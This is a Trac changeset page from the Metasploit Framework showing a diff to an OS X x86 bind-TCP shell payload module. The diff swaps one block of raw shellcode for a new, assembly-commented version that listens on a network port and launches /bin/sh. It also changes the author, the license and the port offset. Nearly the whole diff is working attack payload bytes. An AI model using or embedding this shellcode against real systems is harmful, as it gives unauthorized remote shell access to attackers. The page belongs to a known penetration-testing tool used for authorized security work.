Navigation

← Previous Changeset
Next Changeset →

Changeset 4806

Timestamp:

04/28/07 14:01:25 (1 year ago)

Author:

hdm

Message:

Fixes #88 #89 #90 #91 #92. Replaces bind/reverse for BSD x86, replaces bind for OS X x86, adds reverse/find for OS X x86.

Files:

framework3/tags/framework-3.0/modules/payloads/singles/osx/x86/shell_bind_tcp.rb (modified) (3 diffs)

Legend:

: Unmodified
: Added
: Removed
: Modified
: Copied
: Moved

framework3/tags/framework-3.0/modules/payloads/singles/osx/x86/shell_bind_tcp.rb

r4571	r4806
1		##
2	1	# $Id$
3		##
4
5		##
6		~~# This file is part of the Metasploit Framework and may be subject to~~
7		~~# redistribution and commercial restrictions. Please see the Metasploit~~
8		~~# Framework web site for more information on licensing and terms of use.~~
9		~~# http://metasploit.com/projects/Framework/~~
10		##
11
12	2
13	3	require 'msf/core'
…	…
30	20	'Version' => '$Revision$',
31	21	'Description' => 'Listen for a connection and spawn a command shell',
32		'Author' => '~~nemo <nemo[at]felinemenace~~.org>',
33		'License' => ~~BSD~~_LICENSE,
	22	'Author' => 'Ramon de Carvalho Valle <ramon[at]risesecurity.org>',
	23	'License' => MSF_LICENSE,
34	24	'Platform' => 'osx',
35	25	'Arch' => ARCH_X86,
…	…
40	30	'Offsets' =>
41	31	{
42		'LPORT' => [ 13, 'n' ],
	32	'LPORT' => [ 6, 'n' ],
43	33	},
44	34	'Payload' =>
45		"\x6a\x42\x58\xcd\x80\x6a\x61\x58\x99\x52\x68\x10\x02\x11\x5c"+
46		"\x89\xe1\x52\x42\x52\x42\x52\x6a\x10\xcd\x80\x99\x93\x51\x53"+
47		"\x52\x6a\x68\x58\xcd\x80\xb0\x6a\xcd\x80\x52\x53\x52\xb0\x1e"+
48		"\xcd\x80\x97\x6a\x02\x59\x6a\x5a\x58\x51\x57\x51\xcd\x80\x49"+
49		"\x0f\x89\xf1\xff\xff\xff\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62"+
50		"\x69\x6e\x89\xe3\x50\x54\x54\x53\x53\xb0\x3b\xcd\x80",
	35	"\x31\xc0" +# xorl %eax,%eax #
	36	"\x50" +# pushl %eax #
	37	"\x68\xff\x02\x04\xd2" +# pushl $0xd20402ff #
	38	"\x89\xe7" +# movl %esp,%edi #
	39	"\x50" +# pushl %eax #
	40	"\x6a\x01" +# pushl $0x01 #
	41	"\x6a\x02" +# pushl $0x02 #
	42	"\x6a\x10" +# pushl $0x10 #
	43	"\xb0\x61" +# movb $0x61,%al #
	44	"\xcd\x80" +# int $0x80 #
	45	"\x57" +# pushl %edi #
	46	"\x50" +# pushl %eax #
	47	"\x50" +# pushl %eax #
	48	"\x6a\x68" +# pushl $0x68 #
	49	"\x58" +# popl %eax #
	50	"\xcd\x80" +# int $0x80 #
	51	"\x89\x47\xec" +# movl %eax,-0x14(%edi) #
	52	"\xb0\x6a" +# movb $0x6a,%al #
	53	"\xcd\x80" +# int $0x80 #
	54	"\xb0\x1e" +# movb $0x1e,%al #
	55	"\xcd\x80" +# int $0x80 #
	56	"\x50" +# pushl %eax #
	57	"\x50" +# pushl %eax #
	58	"\x6a\x5a" +# pushl $0x5a #
	59	"\x58" +# popl %eax #
	60	"\xcd\x80" +# int $0x80 #
	61	"\xff\x4f\xe4" +# decl -0x1c(%edi) #
	62	"\x79\xf6" +# jns <bndsockcode+42> #
	63	"\x50" +# pushl %eax #
	64	"\x68\x2f\x2f\x73\x68" +# pushl $0x68732f2f #
	65	"\x68\x2f\x62\x69\x6e" +# pushl $0x6e69622f #
	66	"\x89\xe3" +# movl %esp,%ebx #
	67	"\x50" +# pushl %eax #
	68	"\x54" +# pushl %esp #
	69	"\x54" +# pushl %esp #
	70	"\x53" +# pushl %ebx #
	71	"\x50" +# pushl %eax #
	72	"\xb0\x3b" +# movb $0x3b,%al #
	73	"\xcd\x80" # int $0x80 #
51	74	}
52	75	))

Navigation

Changeset 4806

Legend:

framework3/tags/framework-3.0/modules/payloads/singles/osx/x86/shell_bind_tcp.rb

Download in other formats: